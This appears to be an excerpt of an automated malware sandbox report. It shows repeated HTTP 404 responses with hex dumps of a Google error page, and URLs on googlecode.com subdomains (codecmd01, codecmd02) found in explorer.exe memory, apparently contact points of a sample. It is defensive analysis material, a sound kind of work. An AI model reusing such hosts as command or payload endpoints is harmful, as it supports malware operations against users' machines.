                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:11:46 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:11:47 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:11:48 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:11:50 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:11:51 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:11:52 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: explorer.exe, 00000002.00000003.2919375874.0000000000936000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gif
                      Source: explorer.exe, 00000002.00000003.2821688972.0000000000936000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2802016823.0000000000936000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2901360241.0000000000936000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2870048738.0000000000935000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2372188173.0000000000936000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2754525195.0000000000936000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2372188173.0000000000947000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2775310270.0000000000937000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2395658189.0000000000936000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2666563377.0000000000936000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gif
                      Source: explorer.exe, 00000002.00000003.2821688972.0000000000936000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2802016823.0000000000936000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2538361591.0000000000935000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2754525195.0000000000936000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2775310270.0000000000937000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2666563377.0000000000936000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 